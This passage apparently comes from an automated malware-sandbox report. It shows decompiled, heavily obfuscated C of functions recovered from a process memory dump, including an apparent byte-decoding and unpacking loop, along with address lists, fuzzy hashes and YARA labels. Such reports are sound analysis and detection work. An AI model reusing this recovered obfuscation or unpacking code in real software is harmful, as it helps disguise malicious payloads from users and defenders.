				_t455 = _t453 & 0x00000000 ^ _t507 -  *_t582 ^  *(_t427 + 0x41ce7d);
				_t510 = _t507;
				if(_t455 > _t390) {
					_t239 = _t427 + 0x41c0f6; // 0x41c0f6
					_v12 = 0;
					 *_t582 =  *_t582 ^ _t239;
					_t242 = _t427 + 0x41c3d8; // 0x41c3d8
					 *_t582 =  *_t582 & 0x00000000;
					 *_t582 =  *_t582 + _t242;
					_t390 =  *((intOrPtr*)(_t427 + 0x41f064))(_t491, _v12);
				}
				 *(_t427 + 0x41cf5f) =  *(_t427 + 0x41cf5f) & 0x00000000;
				 *(_t427 + 0x41cf5f) =  *(_t427 + 0x41cf5f) | _t546 ^  *_t582 | _t390;
				_t549 = _t546;
				_t248 = _t427 + 0x41c2c4; // 0x41c2c4
				_v12 = 0;
				 *_t582 =  *_t582 | _t248;
				_t392 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, 0);
				_v12 = _t510;
				 *(_t427 + 0x41c193) =  *(_t427 + 0x41c193) & 0x00000000;
				 *(_t427 + 0x41c193) =  *(_t427 + 0x41c193) | _t510 - _v12 ^ _t392;
				_t513 = _v12;
				 *((intOrPtr*)(_t427 + 0x41f080))();
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 ^ _t455;
				_t260 = _t427 + 0x41d1a0; // 0x41d1a0
				_v12 = _v12 & 0x00000000;
				 *_t582 =  *_t582 ^ _t260;
				_t395 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, _t572);
				_v12 = _t491;
				 *(_t427 + 0x41c59c) =  *(_t427 + 0x41c59c) & 0x00000000;
				 *(_t427 + 0x41c59c) =  *(_t427 + 0x41c59c) | _t491 - _v12 | _t395;
				_t494 = _v12;
				_pop( *_t272);
				_t456 = _v20;
				do {
					_v8 = _v8 - 1;
					 *_t582 =  *_t582 & 0x00000000;
					 *_t582 =  *_t582 + _t456;
					_t276 = _t427 + 0x41ccae; // 0x41ccae
					_v20 = 0;
					 *_t582 =  *_t582 + _t276;
					_t397 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20, _t572);
					_v16 = _v16 & 0x00000000;
					 *_t582 =  *_t582 + _t397;
					_t283 = _t427 + 0x41c045; // 0x41c045
					 *_t582 = _t283;
					_t399 =  *((intOrPtr*)(_t427 + 0x41f060))(_v16, _v16);
					_pop( *_t286);
					_t457 = _v20;
					_v12 = _t549;
					_push(_t457 + _t399);
					_t552 = _v12;
					_pop(_t400);
					_t572 = _t572;
					if((_t457 & 0x00000000 | _t572 & 0x00000000 ^  *(_t427 + 0x41c40d)) > _t400) {
						_t291 = _t427 + 0x41ccae; // 0x41ccae
						_v12 = _v12 & 0x00000000;
						 *_t582 =  *_t582 | _t291;
						_t295 = _t427 + 0x41c045; // 0x41c045
						_v12 = 0;
						 *_t582 =  *_t582 ^ _t295;
						_t400 =  *((intOrPtr*)(_t427 + 0x41f064))(_v12, _v12);
						_v16 = _t552;
						 *(_t427 + 0x41d2c3) =  *(_t427 + 0x41d2c3) & 0x00000000;
						 *(_t427 + 0x41d2c3) =  *(_t427 + 0x41d2c3) | _t552 & 0x00000000 ^ _t400;
						_t552 = _v16;
					}
					_t461 =  *_t582;
					_t583 =  &(_t582[1]);
					_v20 = _t552;
					_v12 = _v20;
					_t516 = _a4 + (_t513 & 0x00000000 ^ (_t552 & 0x00000000 | _t461));
					_v20 = _v20 & 0x00000000;
					_push(_v20);
					 *_t583 =  *_t583 | _t461;
					_v16 = _t400;
					_push(_a8 + _t516 + 1);
					_pop(_t518);
					_push(_v12);
					_pop(_t561);
					 *((intOrPtr*)(_t427 + 0x41f0c0))();
					_t549 =  *_t583;
					 *_t583 = _v8;
					 *_t583 =  *_t583 & 0x00000000;
					 *_t583 =  *_t583 + (_t518 | _a4) + 1;
					_t513 =  *_t583;
					 *_t583 = _a8;
					E00EA31B3(_t427, _t494, _t513, _t549, (_t518 | _a4) + 1, _t572, _t561);
					_t456 =  *_t583;
					_t582 = _t583 - 0xfffffffc;
				} while (_v8 != 0);
				_pop( *_t323);
				return 0;
			}

0x00ea1cd0
0x00ea1cd0
0x00ea1cd0
0x00ea1cd1
0x00ea1cd5
0x00ea1cd8
0x00ea1cda
0x00ea1ce3
0x00ea1cea
0x00ea1ced
0x00ea1cf0
0x00ea1cf6
0x00ea1cfc
0x00ea1d03
0x00ea1d09
0x00ea1d10
0x00ea1d11
0x00ea1d15
0x00ea1d1e
0x00ea1d21
0x00ea1d24
0x00ea1d2a
0x00ea1d2b
0x00ea1d2e
0x00ea1d37
0x00ea1d38
0x00ea1d3b
0x00ea1d3e
0x00ea1d4a
0x00ea1d50
0x00ea1d54
0x00ea1d57
0x00ea1d5a
0x00ea1d5d
0x00ea1d5e
0x00ea1d5f
0x00ea1d65
0x00ea1d68
0x00ea1d6b
0x00ea1d6e
0x00ea1d76
0x00ea1d7d
0x00ea1d80
0x00ea1d89
0x00ea1d8c
0x00ea1d8f
0x00ea1d95
0x00ea1d9c
0x00ea1da2
0x00ea1da2
0x00ea1daa
0x00ea1dae
0x00ea1db2
0x00ea1dbb
0x00ea1dc5
0x00ea1dc8
0x00ea1dce
0x00ea1dd5
0x00ea1ddb
0x00ea1de5
0x00ea1de9
0x00ea1df3
0x00ea1df6
0x00ea1df9
0x00ea1dff
0x00ea1e07
0x00ea1e0e
0x00ea1e14
0x00ea1e20
0x00ea1e23
0x00ea1e2d
0x00ea1e36
0x00ea1e3d
0x00ea1e46
0x00ea1e50
0x00ea1e53
0x00ea1e59
0x00ea1e61
0x00ea1e68
0x00ea1e6e
0x00ea1e71
0x00ea1e7a
0x00ea1e83
0x00ea1e8a
0x00ea1e93
0x00ea1e9a
0x00ea1e9d
0x00ea1ea3
0x00ea1eab
0x00ea1eb2
0x00ea1ec0
0x00ea1ec9
0x00ea1ed0
0x00ea1ed6
0x00ea1edd
0x00ea1ee4
0x00ea1eed
0x00ea1ef7
0x00ea1efa
0x00ea1f00
0x00ea1f07
0x00ea1f0d
0x00ea1f13
0x00ea1f1f
0x00ea1f2b
0x00ea1f2e
0x00ea1f3a
0x00ea1f41
0x00ea1f47
0x00ea1f4f
0x00ea1f52
0x00ea1f5b
0x00ea1f62
0x00ea1f65
0x00ea1f6e
0x00ea1f78
0x00ea1f7b
0x00ea1f7e
0x00ea1f84
0x00ea1f87
0x00ea1f8e
0x00ea1f91
0x00ea1f94
0x00ea1f97
0x00ea1f98
0x00ea1f99
0x00ea1fa8
0x00ea1faa
0x00ea1faf
0x00ea1fba
0x00ea1fc3
0x00ea1fcd
0x00ea1fd0
0x00ea1fd6
0x00ea1fdd
0x00ea1fe3
0x00ea1fe3
0x00ea1fe8
0x00ea1ff1
0x00ea1ffb
0x00ea1ffe
0x00ea2008
0x00ea200c
0x00ea200f
0x00ea201b
0x00ea2022
0x00ea2028
0x00ea2029
0x00ea2032
0x00ea203b
0x00ea2045
0x00ea2048
0x00ea204e
0x00ea2058
0x00ea2062
0x00ea2066
0x00ea2069
0x00ea2075
0x00ea2078
0x00ea207f
0x00ea2082
0x00ea2085
0x00ea2088
0x00ea2089
0x00ea208a
0x00ea2099
0x00ea209b
0x00ea20a0
0x00ea20a2
0x00ea20a9
0x00ea20ad
0x00ea20b0
0x00ea20b9
0x00ea20bc
0x00ea20c2
0x00ea20c9
0x00ea20cf
0x00ea20cf
0x00ea20d4
0x00ea20da
0x00ea20e1
0x00ea20e4
0x00ea20ea
0x00ea20f1
0x00ea20f4
0x00ea2103
0x00ea210a
0x00ea210d
0x00ea2110
0x00ea2113
0x00ea2114
0x00ea2117
0x00ea2122
0x00ea2124
0x00ea2127
0x00ea2129
0x00ea212f
0x00ea2139
0x00ea213c
0x00ea2143
0x00ea2146
0x00ea2149
0x00ea2149
0x00ea214f
0x00ea2156
0x00ea215c
0x00ea2169
0x00ea216b
0x00ea216c
0x00ea2176
0x00ea2179
0x00ea217f
0x00ea2189
0x00ea218c
0x00ea2192
0x00ea2199
0x00ea21a2
0x00ea21b1
0x00ea21b3
0x00ea21b4
0x00ea21bb
0x00ea21be
0x00ea21c1
0x00ea21cd
0x00ea21d4
0x00ea21da
0x00ea21e2
0x00ea21e3
0x00ea21e9
0x00ea21f0
0x00ea21f3
0x00ea21fa
0x00ea21fd
0x00ea2200
0x00ea2206
0x00ea220e
0x00ea2215
0x00ea221b
0x00ea221e
0x00ea2225
0x00ea222b
0x00ea2234
0x00ea2237
0x00ea2240
0x00ea2243
0x00ea2249
0x00ea2250
0x00ea2253
0x00ea225b
0x00ea225e
0x00ea2263
0x00ea2267
0x00ea226a
0x00ea226c
0x00ea227a
0x00ea227c
0x00ea227f
0x00ea2281
0x00ea2287
0x00ea2291
0x00ea2294
0x00ea229b
0x00ea229f
0x00ea22a2
0x00ea22a2
0x00ea22ae
0x00ea22b5
0x00ea22bb
0x00ea22be
0x00ea22c4
0x00ea22ce
0x00ea22d1
0x00ea22d7
0x00ea22df
0x00ea22e6
0x00ea22ec
0x00ea22ef
0x00ea22f6
0x00ea22fa
0x00ea22fd
0x00ea2303
0x00ea230a
0x00ea230d
0x00ea2313
0x00ea231b
0x00ea2322
0x00ea2328
0x00ea232b
0x00ea232e
0x00ea2331
0x00ea2331
0x00ea2335
0x00ea2339
0x00ea233c
0x00ea2342
0x00ea234c
0x00ea234f
0x00ea2355
0x00ea235c
0x00ea235f
0x00ea2368
0x00ea236b
0x00ea2371
0x00ea2374
0x00ea2377
0x00ea237e
0x00ea237f
0x00ea2382
0x00ea2392
0x00ea2395
0x00ea2397
0x00ea239d
0x00ea23a4
0x00ea23a7
0x00ea23ad
0x00ea23b7
0x00ea23ba
0x00ea23c0
0x00ea23c8
0x00ea23cf
0x00ea23d5
0x00ea23d5
0x00ea23da
0x00ea23dd
0x00ea23e0
0x00ea23f0
0x00ea23fc
0x00ea23fe
0x00ea2402
0x00ea2405
0x00ea2408
0x00ea2410
0x00ea2414
0x00ea2415
0x00ea241d
0x00ea241f
0x00ea2429
0x00ea2429
0x00ea242d
0x00ea2431
0x00ea2438
0x00ea2438
0x00ea243b
0x00ea2442
0x00ea2445
0x00ea2448
0x00ea245d
0x00ea2464

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d30f7688323fef24dea233773f5addaff03df6641283267fa772f8f98102af
Instruction ID: 3743b7ff2ca16ff65c06d96ba139849eb8abfd6b9fa553732f1dfec86964fad7
Opcode Fuzzy Hash: 39d30f7688323fef24dea233773f5addaff03df6641283267fa772f8f98102af
Instruction Fuzzy Hash: 9F422772C04218EFEF049FA0C8897EEBBF5FF48311F0544AAD899AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00EA43D8, Relevance: .4, Instructions: 371
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00EA43D8(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				void* _t202;
				void* _t204;
				signed int _t205;
				signed int _t210;
				void* _t212;
				void* _t213;
				signed int _t217;
				signed int _t220;
				signed int _t223;
				signed int _t228;
				void* _t230;
				void* _t232;
				intOrPtr _t233;
				void _t236;
				signed int _t240;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t261;
				signed int _t264;
				signed int _t266;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				void* _t286;
				signed int _t293;
				signed int _t294;
				signed int _t305;
				signed int _t306;
				signed int _t311;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t330;
				signed int _t334;
				signed int _t337;
				signed int _t340;
				signed int _t343;
				void* _t348;
				signed int _t355;
				signed int _t358;
				signed int _t363;
				void* _t364;
				signed int _t366;
				signed int _t369;
				signed int* _t370;
				signed int* _t371;
				signed int* _t372;
				signed int* _t373;
				signed int* _t374;
				signed int* _t375;
				signed int* _t376;
				signed int* _t377;

				_t355 = __esi;
				_t337 = __edi;
				 *_t370 =  *_t370 - _t366;
				 *_t370 = __ebx + 0x41c5e4;
				_t202 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t366 - 0x1c) = 0;
				_push( *(_t366 - 0x1c));
				 *_t370 =  *_t370 + _t202;
				_push(__edi);
				 *_t370 =  *_t370 ^ __edi;
				 *_t370 =  *_t370 | __ebx + 0x0041c129;
				_t204 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t274 = (__ecx & 0x00000000) +  *_t370;
				_t371 = _t370 - 0xfffffffc;
				 *(_t366 - 0x1c) = __ebx;
				_push(_t274 + _t204);
				_t261 =  *(_t366 - 0x1c);
				_pop(_t205);
				_push(__edx);
				_t276 = _t274 & 0x00000000 | __edx ^  *_t371 |  *(_t261 + 0x41c62b);
				_pop(_t305);
				if(_t276 > _t205) {
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 ^ _t261 + 0x0041c5e4;
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 + _t261 + 0x41c129;
					_t205 =  *((intOrPtr*)(_t261 + 0x41f064))(_t366, __esi);
				}
				 *_t371 = _t355;
				 *(_t261 + 0x41d040) = 0 ^ _t205;
				_t358 = 0;
				if( *((intOrPtr*)(_t366 - 0x10)) == 4) {
					_t15 = _t261 + 0x41d1be; // 0x41d1be
					 *_t371 = _t15;
					_t17 = _t261 + 0x41c0a8; // 0x41c0a8
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 ^ _t17;
					_push( *((intOrPtr*)(_t261 + 0x41f068))(_t358,  *(_t366 - 0x24)));
					_pop( *_t19);
					_push( *(_t366 - 0x20));
					_pop( *_t21);
					 *((intOrPtr*)(_t366 - 8)) = 1;
					_t23 = _t261 + 0x41c6f8; // 0x41c6f8
					 *(_t366 - 0x20) =  *(_t366 - 0x20) & 0x00000000;
					 *_t371 =  *_t371 ^ _t23;
					_t251 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x20));
					 *(_t366 - 0x20) = _t305;
					 *(_t261 + 0x41c674) =  *(_t261 + 0x41c674) & 0x00000000;
					 *(_t261 + 0x41c674) =  *(_t261 + 0x41c674) | _t305 ^  *(_t366 - 0x20) | _t251;
					_t334 =  *(_t366 - 0x20);
					 *((intOrPtr*)(_t366 - 0xc)) = 0x55;
					_t36 = _t261 + 0x41c356; // 0x41c356
					 *(_t366 - 0x1c) =  *(_t366 - 0x1c) & 0x00000000;
					 *_t371 =  *_t371 | _t36;
					_t253 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x1c));
					 *(_t366 - 0x24) = _t337;
					 *(_t261 + 0x41cd7d) =  *(_t261 + 0x41cd7d) & 0x00000000;
					 *(_t261 + 0x41cd7d) =  *(_t261 + 0x41cd7d) | _t337 & 0x00000000 ^ _t253;
					_t337 =  *(_t366 - 0x24);
					 *((intOrPtr*)(_t366 - 0x18)) = 2;
					_t48 = _t261 + 0x41cc3e; // 0x41cc3e
					 *(_t366 - 0x24) =  *(_t366 - 0x24) & 0x00000000;
					 *_t371 =  *_t371 ^ _t48;
					_t52 = _t261 + 0x41cf5b; // 0x41cf5b
					 *_t371 =  *_t371 ^ _t358;
					 *_t371 = _t52;
					_t205 =  *((intOrPtr*)(_t261 + 0x41f068))(_t358,  *(_t366 - 0x24));
					 *(_t366 - 0x20) = _t334;
					 *(_t261 + 0x41c1cd) =  *(_t261 + 0x41c1cd) & 0x00000000;
					 *(_t261 + 0x41c1cd) =  *(_t261 + 0x41c1cd) | _t334 & 0x00000000 | _t205;
					_t305 =  *(_t366 - 0x20);
				}
				_t306 = _t305 ^ _t305;
				 *_t371 =  *_t371 - _t337;
				 *_t371 = _t306;
				_t60 = _t261 + 0x41c61d; // 0x41c61d
				 *_t371 =  *_t371 ^ _t358;
				 *_t371 = _t60;
				_t210 =  *((intOrPtr*)(_t261 + 0x41f060))(_t358, _t337, _t205);
				 *_t371 = _t210;
				_t63 = _t261 + 0x41cf67; // 0x41cf67
				 *(_t366 - 0x24) = 0;
				 *_t371 =  *_t371 ^ _t63;
				_t212 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x24),  *(_t366 - 0x1c));
				_pop( *_t67);
				_t278 = _t276 & 0x00000000 ^  *(_t366 - 0x24);
				 *(_t366 - 0x24) = _t337;
				_push(_t278 + _t212);
				_t340 =  *(_t366 - 0x24);
				_pop(_t213);
				_t280 = _t278 & 0x00000000 | _t366 & 0x00000000 ^  *(_t261 + 0x41c5dc);
				_t369 = _t366;
				if(_t280 > _t213) {
					_t72 = _t261 + 0x41c61d; // 0x41c61d
					 *(_t369 - 0x1c) = 0;
					 *_t371 =  *_t371 ^ _t72;
					_t75 = _t261 + 0x41cf67; // 0x41cf67
					 *(_t369 - 0x20) = 0;
					 *_t371 =  *_t371 | _t75;
					_t246 =  *((intOrPtr*)(_t261 + 0x41f064))( *(_t369 - 0x20),  *(_t369 - 0x1c));
					 *(_t369 - 0x1c) = _t280;
					 *((intOrPtr*)(_t261 + 0x41cf4f)) = _t246;
					_t280 =  *(_t369 - 0x1c);
				}
				_t372 =  &(_t371[1]);
				 *_t372 = _t280;
				_t283 = 0;
				 *_t372 = _t306 & 0x00000000 |  *_t371;
				_t84 = _t261 + 0x41cef6; // 0x41cef6
				 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
				 *_t372 =  *_t372 | _t84;
				_t88 = _t261 + 0x41ceb9; // 0x41ceb9
				 *_t372 =  *_t372 ^ _t369;
				 *_t372 =  *_t372 ^ _t88;
				_t217 =  *((intOrPtr*)(_t261 + 0x41f068))(_t369,  *(_t369 - 0x1c),  *(_t369 - 0x24));
				 *(_t261 + 0x41caf5) =  *(_t261 + 0x41caf5) & 0x00000000;
				 *(_t261 + 0x41caf5) =  *(_t261 + 0x41caf5) | _t283 ^  *_t372 | _t217;
				_t286 = _t283;
				_t373 = _t372 - 0xfffffffc;
				_t311 = _t217 %  *(_t369 - 0x18);
				 *_t373 =  *_t373 & 0x00000000;
				 *_t373 =  *_t373 | _t311;
				_t100 = _t261 + 0x41c52d; // 0x41c52d
				 *(_t369 - 0x24) = 0;
				 *_t373 =  *_t373 ^ _t100;
				_t220 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t369 - 0x24), _t286);
				 *(_t261 + 0x41d106) =  *(_t261 + 0x41d106) & 0x00000000;
				 *(_t261 + 0x41d106) =  *(_t261 + 0x41d106) | _t311 & 0x00000000 | _t220;
				_t314 = _t311;
				_t316 = _t314 & 0x00000000 ^  *_t373;
				_t374 = _t373 - 0xfffffffc;
				 *((intOrPtr*)(_t369 - 4)) =  *((intOrPtr*)(_t369 - 4)) - _t316;
				 *(_t369 - 0x24) = 0;
				 *_t374 =  *_t374 | _t316;
				_t112 = _t261 + 0x41c7ee; // 0x41c7ee
				 *_t374 =  *_t374 ^ _t340;
				 *_t374 =  *_t374 ^ _t112;
				_t113 = _t261 + 0x41c513; // 0x41c513
				 *(_t369 - 0x20) = 0;
				 *_t374 =  *_t374 | _t113;
				_t223 =  *((intOrPtr*)(_t261 + 0x41f068))( *(_t369 - 0x20), _t340,  *(_t369 - 0x24), _t286);
				 *(_t369 - 0x20) = _t358;
				 *(_t261 + 0x41c2a8) =  *(_t261 + 0x41c2a8) & 0x00000000;
				 *(_t261 + 0x41c2a8) =  *(_t261 + 0x41c2a8) ^ _t358 & 0x00000000 ^ _t223;
				_t318 =  *_t374;
				_t375 =  &(_t374[1]);
				 *(_t369 - 0x1c) = _t223;
				 *(_t369 - 0x14) =  *(_t369 - 0x14) & 0x00000000;
				 *(_t369 - 0x14) =  *(_t369 - 0x14) | _t223 ^  *(_t369 - 0x1c) ^ _t318;
				_t130 = _t261 + 0x41ccc7; // 0x41ccc7
				 *(_t369 - 0x24) = 0;
				 *_t375 =  *_t375 | _t130;
				_t228 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t369 - 0x24));
				 *(_t261 + 0x41cca4) =  *(_t261 + 0x41cca4) & 0x00000000;
				 *(_t261 + 0x41cca4) =  *(_t261 + 0x41cca4) | _t340 -  *_t375 | _t228;
				_t343 = _t340;
				_t363 =  *(_t369 - 0x20) & 0x00000000 ^ _t261 & 0x00000000 ^  *(_t369 + 8);
				_t264 = _t261;
				_t139 = _t264 + 0x41c550; // 0x41c550
				 *(_t369 - 0x20) = 0;
				 *_t375 =  *_t375 + _t139;
				_t230 =  *((intOrPtr*)(_t264 + 0x41f060))( *(_t369 - 0x20));
				 *(_t369 - 0x20) = 0;
				 *_t375 =  *_t375 + _t230;
				_t145 = _t264 + 0x41d34c; // 0x41d34c
				 *_t375 = _t145;
				_t232 =  *((intOrPtr*)(_t264 + 0x41f060))( *(_t369 - 0x20),  *(_t369 - 0x20));
				_t376 = _t375 - 0xfffffffc;
				 *_t148 = _t232;
				 *(_t369 - 0x24) =  *(_t369 - 0x24) + (0 ^  *_t375);
				_push( *(_t369 - 0x24));
				_pop(_t233);
				_t320 = _t318;
				 *(_t369 - 0x1c) = _t320;
				_t323 =  *(_t369 - 0x1c);
				if( *((intOrPtr*)(_t264 + 0x41ccf8)) > _t233) {
					_t155 = _t264 + 0x41c550; // 0x41c550
					 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
					 *_t376 =  *_t376 + _t155;
					_t159 = _t264 + 0x41d34c; // 0x41d34c
					 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
					 *_t376 =  *_t376 + _t159;
					_t233 =  *((intOrPtr*)(_t264 + 0x41f064))( *(_t369 - 0x1c),  *(_t369 - 0x1c));
				}
				 *(_t369 - 0x24) = _t323;
				 *((intOrPtr*)(_t264 + 0x41ce46)) = _t233;
				_t326 =  *(_t369 - 0x24);
				 *(_t369 - 0x1c) = _t326;
				_t169 = _t264 + 0x41cb9d; // 0x41cb9d
				 *_t376 =  *_t376 - _t363;
				 *_t376 =  *_t376 | _t169;
				_t170 = _t264 + 0x41cd17; // 0x41cd17
				 *(_t369 - 0x20) =  *(_t369 - 0x20) & 0x00000000;
				 *_t376 =  *_t376 | _t170;
				_t236 =  *((intOrPtr*)(_t264 + 0x41f068))( *(_t369 - 0x20), _t363);
				 *_t376 = _t343 & 0x00000000 | _t326 & 0x00000000 ^ _t363;
				 *(_t264 + 0x41d015) = 0 ^ _t236;
				_t348 = 0;
				_t364 = _t363 - 1;
				 *(_t369 - 0x1c) = 0;
				_push( *(_t369 - 0x1c));
				 *_t376 =  *_t376 | _t264;
				do {
					 *_t178 = _t348;
					_t293 =  *(_t369 - 0x20);
					_t294 = _t293 &  *(_t369 - 8);
					if(_t294 == 0) {
						_t364 = _t364 + 1;
						_t236 = _t236 & 0x00000000 ^ (_t348 -  *_t376 |  *(_t369 - 0x18));
						_t348 = _t348;
						_t264 =  *(_t236 + _t364) & 0x000000ff;
					}
					 *_t184 =  *((intOrPtr*)(_t369 - 0xc));
					_t330 =  *(_t369 - 0x20);
					asm("rol edx, cl");
					asm("lodsb");
					_t236 = _t236 | _t330 & _t264;
					 *_t348 = _t236;
					_t348 = _t348 + 1;
					_t186 = _t369 - 4;
					 *_t186 =  *((intOrPtr*)(_t369 - 4)) - 1;
				} while ( *_t186 != 0);
				_t266 =  *_t376;
				_t377 =  &(_t376[1]);
				_t188 = _t266 + 0x41cc0b; // 0x41cc0b
				 *_t377 =  *_t377 & 0x00000000;
				 *_t377 =  *_t377 ^ _t188;
				_t189 = _t266 + 0x41cbd0; // 0x41cbd0
				 *_t377 =  *_t377 & 0x00000000;
				 *_t377 =  *_t377 | _t189;
				_t240 =  *((intOrPtr*)(_t266 + 0x41f068))(_t369, _t294);
				 *(_t369 - 0x20) = _t294;
				 *(_t266 + 0x41d326) =  *(_t266 + 0x41d326) & 0x00000000;
				 *(_t266 + 0x41d326) =  *(_t266 + 0x41d326) ^ (_t294 ^  *(_t369 - 0x20) | _t240);
				 *(_t369 - 0x1c) = _t266;
				return memcpy(_t348, _t364 + 1,  *(_t369 - 0x14));
			}

0x00ea43d8
0x00ea43d8
0x00ea43df
0x00ea43e2
0x00ea43e5
0x00ea43eb
0x00ea43f2
0x00ea43f5
0x00ea43fe
0x00ea43ff
0x00ea4402
0x00ea4405
0x00ea4411
0x00ea4414
0x00ea4417
0x00ea441e
0x00ea441f
0x00ea4422
0x00ea4423
0x00ea4430
0x00ea4432
0x00ea4435
0x00ea443e
0x00ea4442
0x00ea444c
0x00ea4450
0x00ea4453
0x00ea4453
0x00ea445b
0x00ea4462
0x00ea4468
0x00ea446d
0x00ea4473
0x00ea447c
0x00ea447f
0x00ea4486
0x00ea448a
0x00ea4493
0x00ea4494
0x00ea4497
0x00ea449a
0x00ea44a0
0x00ea44a7
0x00ea44ad
0x00ea44b4
0x00ea44b7
0x00ea44bd
0x00ea44c5
0x00ea44cc
0x00ea44d2
0x00ea44d5
0x00ea44dc
0x00ea44e2
0x00ea44e9
0x00ea44ec
0x00ea44f2
0x00ea44fa
0x00ea4501
0x00ea4507
0x00ea450a
0x00ea4511
0x00ea4517
0x00ea451e
0x00ea4521
0x00ea4528
0x00ea452b
0x00ea452e
0x00ea4534
0x00ea453c
0x00ea4543
0x00ea4549
0x00ea4549
0x00ea4551
0x00ea4555
0x00ea4558
0x00ea455b
0x00ea4562
0x00ea4565
0x00ea4568
0x00ea4571
0x00ea4574
0x00ea457a
0x00ea4584
0x00ea4587
0x00ea4593
0x00ea4596
0x00ea4599
0x00ea45a0
0x00ea45a1
0x00ea45a4
0x00ea45b2
0x00ea45b4
0x00ea45b7
0x00ea45b9
0x00ea45bf
0x00ea45c9
0x00ea45cc
0x00ea45d2
0x00ea45dc
0x00ea45df
0x00ea45e5
0x00ea45ec
0x00ea45f2
0x00ea45f2
0x00ea45fe
0x00ea4603
0x00ea460d
0x00ea4611
0x00ea4614
0x00ea461a
0x00ea4621
0x00ea4624
0x00ea462b
0x00ea462e
0x00ea4631
0x00ea463d
0x00ea4644
0x00ea464a
0x00ea4654
0x00ea4657
0x00ea465b
0x00ea465f
0x00ea4662
0x00ea4668
0x00ea4672
0x00ea4675
0x00ea4681
0x00ea4688
0x00ea468e
0x00ea4695
0x00ea4698
0x00ea46a1
0x00ea46a5
0x00ea46af
0x00ea46b2
0x00ea46b9
0x00ea46bc
0x00ea46bf
0x00ea46c5
0x00ea46cf
0x00ea46d2
0x00ea46d8
0x00ea46e0
0x00ea46e7
0x00ea46f2
0x00ea46f5
0x00ea46f8
0x00ea4700
0x00ea4704
0x00ea470a
0x00ea4710
0x00ea471a
0x00ea471d
0x00ea4729
0x00ea4730
0x00ea4736
0x00ea4741
0x00ea4743
0x00ea4744
0x00ea474a
0x00ea4754
0x00ea4757
0x00ea475d
0x00ea4767
0x00ea476a
0x00ea4773
0x00ea4776
0x00ea4781
0x00ea4788
0x00ea478b
0x00ea478e
0x00ea4791
0x00ea4792
0x00ea4793
0x00ea47a0
0x00ea47a5
0x00ea47a7
0x00ea47ad
0x00ea47b4
0x00ea47b7
0x00ea47bd
0x00ea47c4
0x00ea47c7
0x00ea47c7
0x00ea47cd
0x00ea47d4
0x00ea47da
0x00ea47dd
0x00ea47ed
0x00ea47f4
0x00ea47f7
0x00ea47fa
0x00ea4800
0x00ea4807
0x00ea480a
0x00ea4812
0x00ea4819
0x00ea481f
0x00ea4820
0x00ea4821
0x00ea4828
0x00ea482b
0x00ea482e
0x00ea482f
0x00ea4835
0x00ea4836
0x00ea4839
0x00ea483b
0x00ea4846
0x00ea4848
0x00ea4849
0x00ea4849
0x00ea4850
0x00ea4856
0x00ea4857
0x00ea485b
0x00ea485c
0x00ea485e
0x00ea4860
0x00ea4861
0x00ea4861
0x00ea4861
0x00ea4868
0x00ea486b
0x00ea486e
0x00ea4875
0x00ea4879
0x00ea487c
0x00ea4883
0x00ea4887
0x00ea488a
0x00ea4890
0x00ea4898
0x00ea489f
0x00ea48a8
0x00ea48c1

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950c55eab0a1380bd81bf2ad2fa2bd8a9b0f1be257dd98b9728846acfec3c26f
Instruction ID: eb5900057b8a7958601ab17522f5ba1ac0de0b561d245935336886eeff636af1
Opcode Fuzzy Hash: 950c55eab0a1380bd81bf2ad2fa2bd8a9b0f1be257dd98b9728846acfec3c26f
Instruction Fuzzy Hash: 190223728442088FEF04DFA4C88A7EEBBF1FF48310F19856ED889AA145D7385525CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2FAF, Relevance: .2, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00EA2FAF(void* __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4) {
				char _v2;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t60;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t65;
				signed int _t68;
				signed int _t74;
				void* _t77;
				signed int _t80;
				void* _t81;
				void* _t83;
				void* _t86;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t95;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t105;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t114;
				void* _t117;
				signed int _t120;
				signed int _t127;
				void* _t128;
				signed int _t130;
				signed int _t133;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				void* _t148;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t156;
				void* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
